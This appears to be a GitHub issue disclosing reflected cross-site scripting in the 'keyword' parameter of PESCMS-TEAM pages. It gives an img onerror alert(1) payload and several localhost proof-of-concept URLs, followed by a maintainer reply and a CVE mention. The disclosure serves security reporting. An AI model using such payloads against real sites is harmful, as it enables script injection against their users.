We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
I found multiple reflected cross site scripting vulnerability where the page use Model_index.php ,we can see where is no XSS filter in "keyword" parameter. now I input payload :aa">< img src=x onerror=alert(1)> the full url is :http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
and the code is running
and there are lots of pages use Model_index.php,and they all have reflected cross site scripting vulnerability.Like:
http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
http://127.0.0.1/Public/?g=Team&m=User_group&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
http://127.0.0.1/Public/?g=Team&m=Department&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
http://127.0.0.1/Public/?g=Team&m=Bulletin&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
.. .. ..
The text was updated successfully, but these errors were encountered:
Thank you, I will fix this problem.
Sorry, something went wrong.
即将发布的新版已经接近此问题。https://github.com/lazyphp/PESCMS-TEAM/tree/dev-2.3.0
@lazyphp 问题已经解决了吗 ? 请注意,已分配 CVE-2018-16371
No branches or pull requests
I found multiple reflected cross site scripting vulnerability where the page use Model_index.php ,we can see where is no XSS filter in "keyword" parameter.
![clipboard](https://user-images.githubusercontent.com/16055573/44861996-5d08a480-acac-11e8-8754-2a78d1311ef7.png)
now I input payload :aa">< img src=x onerror=alert(1)>
the full url is :http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
and the code is running
![clipbzoard](https://user-images.githubusercontent.com/16055573/44862019-6bef5700-acac-11e8-8351-439d79c1c7b0.png)
and there are lots of pages use Model_index.php,and they all have reflected cross site scripting vulnerability.Like:
http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
http://127.0.0.1/Public/?g=Team&m=User_group&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
http://127.0.0.1/Public/?g=Team&m=Department&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
http://127.0.0.1/Public/?g=Team&m=Bulletin&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
..
..
..
The text was updated successfully, but these errors were encountered: